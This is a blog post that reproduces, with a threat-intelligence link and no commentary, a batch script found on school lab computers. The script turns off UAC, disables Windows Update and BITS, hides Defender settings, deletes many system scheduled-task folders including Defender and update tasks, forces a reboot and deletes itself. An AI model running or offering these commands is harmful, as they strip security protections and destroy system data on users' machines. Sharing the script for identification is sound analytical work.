学校机房电脑内置的奇怪脚本

已于 2025-04-26 13:10:05 修改
阅读量226 收藏 8
点赞数 5
文章标签: 汇编
于 2025-04-26 13:07:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_81066111/article/details/147530732
版权


https://s.threatbook.com/report/file/4d6de86ff6783a4e546d05431a0e8efa6fc57fd7664c6808b92abdd206631968

@Echo off
color 1f
powercfg /h off
REG DELETE HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /va /f /reg:64
REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /va /f /reg:64
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t REG_DWORD /d "00000000" /f /reg:64
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorUser" /t REG_DWORD /d "00000000" /f /reg:64
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d "00000000" /f
REG ADD "HKLM\SYSTEM\CurrentControlSet\services\BITS" /v "Start" /t REG_DWORD /d "00000004" /f /reg:64
REG ADD "HKLM\SYSTEM\CurrentControlSet\services\wuauserv" /v "Start" /t REG_DWORD /d "00000004" /f /reg:64
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowCpl" /t REG_DWORD /d "00000001" /f
REM -- REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowCpl" /v "1" /t REG_SZ /d "Sync Center Folder" /f
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowCpl" /v "2" /t REG_SZ /d "Windows Defender" /f
cls
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\DirectX"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\HelloFace"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\InstallService"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\PushToInstall"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\USB"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\.NET Framework"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\Active Directory Rights Management Services Client"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\AppID"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\Application Experience"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\ApplicationData"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\AppxDeploymentClient"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\Autochk"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\BitLocker"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\Bluetooth"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\BrokerInfrastructure"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\CertificateServicesClient"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\Chkdsk"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\Clip"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\CloudExperienceHost"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\Customer Experience Improvement Program"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\Data Integrity Scan"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\Defrag"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\Device Setup"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\Device Information"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\DeviceDirectoryClient"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\Diagnosis"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\DiskCleanup"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\DiskDiagnostic"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\DiskFootprint"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\DUSM"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\EDP"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\EnterpriseMgmt"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\ErrorDetails"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\Feedback"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\File Classification Infrastructure"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\FileHistory"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\LanguageComponentsInstaller"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\License Manager"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\Live"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\Location"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\Maps"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\Offline Files"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\SettingSync"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\Maintenance"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\Management"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\MemoryDiagnostic"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\Mobile Broadband Accounts"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\NlaSvc"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\PI"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\PLA"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\RecoveryEnvironment"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\Registry"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\RemoteApp and Desktop Connections Update"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\RemoteAssistance"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\RetailDemo"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\Servicing"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\Setup"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\SharedPC"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\SpacePort"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\Speech"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\Storage Tiers Management"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\Subscription"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\SyncCenter"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\Sysmain"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\SystemRestore"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\TaskScheduler"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\Time Synchronization"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\Time Zone"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\TPM"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\UpdateOrchestrator"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\WCM"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\WDI"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\Windows Activation Technologies"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\WindowsBackup"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\Windows Defender"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\Windows Error Reporting"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\Windows Media Sharing"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\WindowsUpdate"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\WOF"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\Work Folders"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\Workplace Join"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\WS"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\WwanSvc"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\XblGameSave"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\ExploitGuard"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\Printing"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\UNP"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\WaaSMedic"
rd /S /Q "%SystemRoot%\System32\Tasks\Microsoft\Windows\Windows Subsystem For Linux"
cls
shutdown.exe /r /f /t 10 /c "Restart"
del /F /Q %0
exit

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值